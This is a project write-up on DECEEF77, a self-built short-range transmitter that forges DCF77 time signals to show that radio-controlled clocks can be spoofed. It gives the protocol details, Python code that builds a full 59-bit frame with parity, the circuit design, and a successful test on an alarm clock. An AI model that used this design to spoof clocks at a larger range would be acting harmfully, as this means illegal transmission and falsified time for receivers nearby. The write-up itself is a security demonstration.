To demonstrate the vulnerability of DCF77 systems, a small transmitter with a range of about 30 cm was built. Higher ranges would require a larger antenna and an amplifier. This would be possible with little effort, but transmitting the signal would be illegal. The transmitter can send arbitrarily manipulated time information (date/time/weekday), which is adopted by the DCF77 clocks within its range.

DECEEF77 transmitter

DCF77 pirate transmitter: DECEEF77

Project goal: a short-range DCF77 pirate transmitter. Pictured is the self-developed hardware and software DECEEF77 V.1.0. After switching on, i.e. connecting the mini USB power supply, the timestamp to be transmitted can be set via the three buttons (+ / Enter / -).

Protocol

Carrier frequency: 77.5 kHz
Modulation: amplitude modulation
Bit rate: 1 bit per second
0.1 s carrier reduction: logical 0
0.2 s carrier reduction: logical 1
59th second: no carrier reduction

The following figure shows the transmission power over time. Every second, the transmission power is reduced for 0.1 seconds (logical 0) or 0.2 seconds (logical 1); in the 59th second, no reduction takes place.
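The per-second keying described above can be sketched as a small helper that returns how long the carrier is reduced for a given second of the minute. This is an illustrative function, not the actual DECEEF77 firmware:

```python
def carrier_reduction(second, bit):
    """Duration (in seconds) of the carrier-power reduction for a given
    second of the minute: 0.1 s encodes a logical 0, 0.2 s a logical 1,
    and the 59th second has no reduction (minute marker)."""
    if second == 59:
        return 0.0
    return 0.2 if bit else 0.1
```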

DCF77 AM modulation

The complete timestamp is transmitted within one minute. The following circle diagram shows the 59 bits transmitted per minute. One bit is transmitted per second, each marked as a line on the circle.

DCF77 circle diagram

The timestamp is encoded in bits 21 to 58. The bits marked P1, P2, and P3 are parity bits used to validate the correct transmission of the signal.
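The encoding of bits 21 to 58 can be sketched in Python as follows. This follows the publicly documented DCF77 time code (BCD fields transmitted least significant bit first, with even parity bits P1-P3) and is an illustration, not the DECEEF77 firmware itself; bits 1-14 (weather data) are simply left at 0:

```python
def bcd_bits(value, n_bits):
    """Encode a value as BCD (tens in the high nibble), emitted least
    significant bit first over n_bits."""
    bcd = (value // 10) * 16 + (value % 10)
    return [(bcd >> i) & 1 for i in range(n_bits)]

def dcf77_frame(minute, hour, day, weekday, month, year2, cest=False):
    """Build the 59-bit DCF77 frame (bit 0 .. bit 58).

    year2 is the two-digit year (e.g. 16 for 2016); weekday is
    1 = Monday .. 7 = Sunday.
    """
    bits = [0] * 59
    bits[17] = 1 if cest else 0           # CEST (summer time) flag
    bits[18] = 0 if cest else 1           # CET (winter time) flag
    bits[20] = 1                          # start of encoded time, always 1
    bits[21:28] = bcd_bits(minute, 7)
    bits[28] = sum(bits[21:28]) % 2       # P1: even parity over the minutes
    bits[29:35] = bcd_bits(hour, 6)
    bits[35] = sum(bits[29:35]) % 2       # P2: even parity over the hours
    bits[36:42] = bcd_bits(day, 6)
    bits[42:45] = bcd_bits(weekday, 3)
    bits[45:50] = bcd_bits(month, 5)
    bits[50:58] = bcd_bits(year2, 8)
    bits[58] = sum(bits[36:58]) % 2       # P3: even parity over the date
    return bits
```

Each bit of the resulting frame is then transmitted in its corresponding second via the carrier reduction described above.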

Hardware DECEEF77

  • µC: Atmel ATMEGA328P-PU
  • 16 MHz crystal clock
  • 77.5 kHz square-to-sine filter
  • Operational amplifier as a driver for the antenna
  • A ferrite rod antenna intended for receiving the DCF77 signal was used to transmit it
  • PCB design with Altium Designer

Circuit description

DECEEF77 schematic

The microcontroller U1 divides the 16 MHz crystal clock down to 77.5 kHz. On port PB3, either a 5 V square wave with the 77.5 kHz signal is output, or PB3 is switched to high impedance. Thus 100% amplitude modulation is used (full power or no power). When the output is in the high-impedance state, R2 and R4 pull the level to 2.5 V.

Several low-pass filter stages (R6 to R9, C6, C7, C10 and C11) convert the square wave into a sine wave (or an approximation of one).

DECEEF77 low-pass filter

The operational amplifier U3 amplifies the signal and couples it to the antenna via the capacitor C9.

DECEEF77 amplifier

The switches S1, S2 and S3 are connected directly to microcontroller ports configured as inputs with pull-ups. The switches are used to set the time (+, Enter, -).

DECEEF77 switches

U2 is the LCD display, which uses a 4-bit interface.

DECEEF77 display

J1 serves as the in-circuit programming interface and uses the standard 6-pin ISP layout.

DECEEF77 ISP

The Test

A DCF77 alarm clock was used to test the transmitter. After 3 to 5 minutes, the alarm clock runs in sync with the transmitter.

DECEEF77_TEST